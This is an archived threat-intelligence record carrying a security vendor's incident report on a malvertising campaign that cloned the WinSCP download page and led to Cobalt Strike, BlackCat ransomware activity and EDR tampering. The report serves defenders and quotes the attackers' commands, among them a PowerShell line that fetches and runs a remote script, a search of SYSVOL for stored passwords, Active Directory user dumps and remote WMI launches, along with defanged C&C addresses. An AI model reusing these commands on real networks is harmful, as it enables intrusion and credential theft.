{
	"id": "0d19c198-1a78-441d-92c3-6e877be32fa9",
	"created_at": "2026-04-06T00:08:44.412094Z",
	"updated_at": "2026-04-10T03:29:39.8946Z",
	"deleted_at": null,
	"sha1_hash": "bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1",
	"title": "Malvertising Used as Entry Vector for BlackCat Actors Also Leverage SpyBoy Terminator",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1891551,
	"plain_text": "Malvertising Used as Entry Vector for BlackCat Actors Also Leverage\r\nSpyBoy Terminator\r\nPublished: 2023-06-30 · Archived: 2026-04-05 13:10:19 UTC\r\nRecently, the Trend Micro incident response team engaged with a targeted organization after having identified highly\r\nsuspicious activities through the Targeted Attack Detection (TAD) service. In the investigation, malicious actors used\r\nmalvertising to distribute a piece of malware via cloned webpages of legitimate organizations. In this case, the distribution\r\ninvolved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.\r\nAdvertising platforms like Google Adsopen on a new tab enable businesses to display advertisements to target audiences to\r\nboost traffic and increase sales. Malware distributors abuse the same functionality in a technique known as malvertising,\r\nwhere chosen keywords are hijacked to display malicious ads that lure unsuspecting search engine users into downloading\r\ncertain types of malware.\r\nThe targeted organization conducted a joint investigation with the Trend team and discovered that cybercriminals performed\r\nthe following unauthorized and malicious activities within the company’s network:\r\nStole top-level administrator privileges and used these privileges to conduct unauthorized activities\r\nAttempted to establish persistence and backdoor access to the customer environment using remote management tools\r\nlike AnyDesk\r\nAttempted to steal passwords and tried to access backup servers\r\nIt is highly likely that the enterprise would have been substantially affected by the attack if intervention had been sought\r\nlater, especially since the threat actors had already succeeded in gaining initial access to domain administrator privileges and\r\nstarted establishing backdoors and persistence.\r\nThe following chart represents how the infection starts.\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 1 of 8\n\nFigure 1. Infection chain of the observed attack\r\nIn the following sections, we discuss the details of this case: how threat actors made the initial access, what kind of attacks\r\nthey carried out, and the lessons that can be drawn from this event.\r\nDeep dive into the infection chain\r\nThe infection starts once the user searches for “WinSCP Download” on the Bing search engine. A malicious ad for the\r\nWinSCP application is displayed above the organic search results. The ad leads to a suspicious website containing a tutorial\r\non how to use WinSCP for automating file transfer.\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 2 of 8\n\nFigure 2. A suspicious site from a malvertisement\r\nFrom this first page, the user is then redirected to a cloned download webpage of WinSCP (winsccp[.]com). Once the user\r\nselects the “Download” button, an ISO file is downloaded from an infected WordPress webpage\r\n(hxxps://events.drdivyaclinic[.]com). Recently, the malicious actor changed their final stage payload URL to the file-sharing\r\nservice 4shared.\r\nFigure 3. Malicious download site\r\nThe overall infection flow involves delivering the initial loader, fetching the bot core, and ultimately, dropping the payload,\r\ntypically a backdoor.\r\nIn summary, the malicious actor uses the following malvertising infection chain:\r\n1. A user searches for an application by entering a search term in a search bar (such as Google or Bing). In this\r\nexample, the user wants to download the WinSCP application and enters the search term “WinSCP Download” on the\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 3 of 8\n\nBing search bar.\r\n2.  Above the organic search results, the user finds a malvertisement for the WinSCP application that leads to a\r\nmalicious website.\r\n3. Once the user selects the “Download” button, this begins the download of an ISO file to their system.\r\nOn Twitter, user @rerednawyergopen on a new tab first spotted the same infection chain mimicking the AnyDesk\r\napplication. Once the user mounts the ISO, it contains two files, setup.exe and msi.dll. We list the details of these two files\r\nhere:\r\nSetup.exe: A renamed msiexec.exe executable\r\nMsi.dll: A delayed-loadedopen on a new tab DLL (not loaded until a user’s code attempts to reference a symbol\r\ncontained within the DLL) that will act as a dropper for a real WinSCP installer and a malicious Python execution\r\nenvironment responsible for downloading Cobalt Strike beacons.\r\nFigure 4. The files downloaded once a user mounts the ISO\r\nOnce setup.exe is executed, it will call the msi.dll that will later extract a Python folder from the DLL RCDATA section as a\r\nreal installer for WinSCP to be installed on the machine. Two installations of Python3.10 will be created — a legitimate\r\npython installation in %AppDataLocal%\\Python-3.10.10 and another installation in %Public%\\Music\\python containing a\r\ntrojanized python310.dll. Finally, the DLL will create a persistence mechanism to make a run key named “Python” and the\r\nvalue C:\\Users\\Public\\Music\\python\\pythonw.exe.\r\nFigure 5. The run key named “Python”\r\nWhen the executable pythonw.exe starts, it loads a modified/trojanized obfuscated python310.dll that contains a Cobalt\r\nStrike beacon that connects to 167[.]88[.]164[.]141.\r\nThe following command-and-control (C\u0026C) servers are used to obtain the main beacon module:\r\nFile name C\u0026C\r\npp.py hxxps://167.88.164.40/python/pp2\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 4 of 8\n\nwork2.py hxxps://172.86.123.127:8443/work2z\r\nwork2-2.py hxxps://193.42.32.58:8443/work2z\r\nwork3.py hxxps://172.86.123.226:8443/work3z\r\nMultiple scheduled tasks executing batch files for persistence were also created in the machine. These batch files execute\r\nPython scripts leading to in-memory execution of Cobalt Strike beacons. Interestingly, the Python scripts use the marshal\r\nmodule to execute a pseudo-compiled (.pyc) code that is leveraged to download and execute the malicious beacon module in\r\nmemory.\r\nThe Trend Vision One™ platform was able to generate the following Workbench for the previously mentioned kill chain.\r\nFigure 6. Kill chain for the executed malware\r\nThe threat actor used a few other tools for discovery in the customer's environment. First, they used AdFind, a tool designed\r\nto retrieve and display information from Active Directory (AD) environments. In the hands of a threat actor, AdFind can be\r\nmisused for enumeration of user accounts, privilege escalation, and even password hash extraction.\r\nIn this case, the threat actor used it to fetch information on the operating system using the command adfind.exe -f\r\nobjectcategory=computer -csv name cn OperatingSystem dNSHostName. The command specifies that it wants to retrieve\r\nthe values of the name, common name (CN), operating system, and dNSHostName attributes for each computer object and\r\noutput its result in a CSV format.\r\nThe threat actor used the following PowerShell command to gather user information and to save it into a CSV file:\r\nGet-ADUser -Filter * -Properties * | Select -Property\r\nEmailAddress,GivenName,Surname,DisplayName,sAMAccountName,Title,Department,OfficePhone,MobilePhone,Fax,Enabled,LastLog\r\n| Export-CSV \"C:\\users\\public\\music\\ADusers.csv\" -NoTypeInformation -Encoding UTF8\r\nWe also observed that the threat actor used AccessChk64, a command-line tool developed by Sysinternals that is primarily\r\nused for checking the security permissions and access rights of objects in Windows. Although the threat actor’s purpose for\r\nusing the tool in this instance is not clear, it should be noted that the tool can be used for gaining insights on what\r\npermissions are assigned to users and groups, as well as for privilege escalation and the identification of files, directories, or\r\nservices with weak access control settings. \r\nThe threat actor then used findstr, a command-line tool in Windows used for searching strings or regular expressions within\r\nfiles by using the command findstr /S /I cpassword \\\\\u003cREDACTED\u003e\\sysvol\\\u003cREDACTED\u003e\\policies\\*.xml.\r\nIt is possible that the purpose of this command is to identify any XML files that contain the string cpassword. This is\r\ninteresting from a security context since cpassword is associated with a deprecated method of storing passwords in Group\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 5 of 8\n\nPolicy Preferences within AD.\r\nFigure 7. How finsdtr is used in the attack\r\nWe also observed the execution of scripts with PowerShell. For instance, the command IEX (New-Object\r\nNet.Webclient).DownloadString('hxxp://127[.]0[.]0[.]1:40347/'); Invoke-FindLocalAdminAccess -Thread 50\" it invokes a\r\nPowerShell function called Invoke-FindLocalAdminAccess and passes the parameter -Thread with a value of 50. This\r\nfunction is likely part of a script that performs actions related to finding local administrator access on a system.\r\nAnother PowerShell script used by the threat actor was PowerView. PowerView, which belongs to the PowerSploit\r\ncollection of scripts used to assist in penetration testing and security operations, focuses on AD reconnaissance and\r\nenumeration and is commonly used by threat actors to gather information about the AD environment.\r\nPowerShell Expand-Archive command was used to extract the ZIP files.  \r\npowershell -w hidden -command Expand-Archive C:\\users\\public\\videos\\python.zip -DestinationPath\r\nC:\\users\\public\\videos\\python\r\nWMI was used to launch CoBeacon remotely across the environment. \r\nC:\\WINDOWS\\system32\\cmd.exe /C wmic /NODE:\"\u003cREDACTED\u003e\" process call create\r\nC:\\users\\public\\videos\\python\\pythonw.exe C:\\users\\public\\videos\\python\\work2-2.py\r\nTo obtain high-privileged credentials and escalate privileges, the threat actor used a Python script also containing the\r\nmarshal module to execute a pseudo-compiled code for LaZagneopen on a new tab. Another script to obtain Veeam\r\ncredentials following the same structure was also identified in the environment.\r\nPsExec, BitsAdmin, and curl were used to download additional tools and to move laterally across the environment.\r\nThe threat actor dropped a detailed KillAV BAT script (KillAV is a type of malicious software specifically designed to\r\ndisable or bypass antivirus or antimalware programs installed on a target system) to tamper with Trend protections.\r\nHowever, due to the agent’s Self-Protection features and VSAPI detections, the attempt failed. The threat actors also made\r\nattempts to stop Windows Defender through a different KillAV BAT script.\r\nFinally, the threat actor installed the AnyDesk remote management tool (renamed install.exe) in the environment to maintain\r\npersistence.\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 6 of 8\n\nFigure 8. Remote management tool installed for persistence\r\nAfter a diligent and proactive response, the attacker was successfully evicted from the network before they could reach their\r\ngoal or execute their final payload. The incident response team also presented immediate countermeasures as well as\r\nmedium- and long-term security procedures for implementation.\r\nBlackCat uses the same tools, techniques, and procedures (TTPs)\r\nIn another investigation, following the same TTPs described previously described, we were able to identify that this activity\r\nled to a BlackCatnews article (aka ALPHV) infection. Along with other types of malware and tools already mentioned, we\r\nwere able to identify the use of the anti-antivirus or anti-endpoint detection and response (EDR) SpyBoyopen on a new tab\r\nterminator in an attempt to tamper with protection provided by agents.\r\nIn order to exfiltrate the customer data, the threat actor used PuTTY Secure Copy client (PSCP) to transfer the gathered\r\ninformation. Investigating one of the C\u0026C domains used by the threat actor behind this infection also led to the discovery of\r\na possible related Cl0pnews article ransomware file.\r\nFigure 9. Files indicating possible Cl0p ransomware file\r\nConclusion and recommendations\r\nIn recent years, attackers have become increasingly adept at exploiting vulnerabilities that victims themselves are unaware\r\nof and have started employing behaviors that organizations do not anticipate. In addition to a continuous effort to prevent\r\nany unauthorized access, early detection and response within an organization’s network is critical. Immediacy in remediation\r\nis also essential, as delays in reaction time could lead to serious damage.\r\nBy understanding attack scenarios in detail, organizations can not only identify vulnerabilities that could lead to compromise\r\nand critical damage but also take necessary measures to prevent them.\r\nOrganizations can protect themselves by taking the following security measures:\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 7 of 8\n\nEducate employees about phishing. Conduct training sessions to educate employees about phishing attacks and\r\nhow to identify and avoid them. Emphasize the importance of not selecting suspicious links and not downloading\r\nfiles from unknown sources.\r\nMonitor and log activities. Implement a centralized logging system to collect and analyze logs from various\r\nnetwork devices and systems. Monitor network traffic, user activities, and system logs to detect any unusual or\r\nsuspicious behavior.\r\nDefine normal network traffic for normal operations. Defining normal network traffic will help identify abnormal\r\nnetwork traffic, such as unauthorized access.\r\nImprove incident response and communication. Develop an incident response plan to guide your organization's\r\nresponse in case of future breaches. Establish clear communication channels to inform relevant stakeholders,\r\nincluding employees, customers, and regulatory bodies, about a breach and the steps being taken to address it.\r\nEngage with a cybersecurity professional. If your organization lacks the expertise or resources to handle the\r\naftermath of a breach effectively, consider engaging with a reputable cybersecurity firm to assist with incident\r\nresponse, forensic analysis, and security improvements.\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nhttps://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html"
	],
	"report_names": [
		"malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434124,
	"ts_updated_at": 1775791779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1.pdf",
		"text": "https://archive.orkl.eu/bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1.txt",
		"img": "https://archive.orkl.eu/bb278f11ce63ffb92da1b87ac40c6bf7b59dfaf1.jpg"
	}
}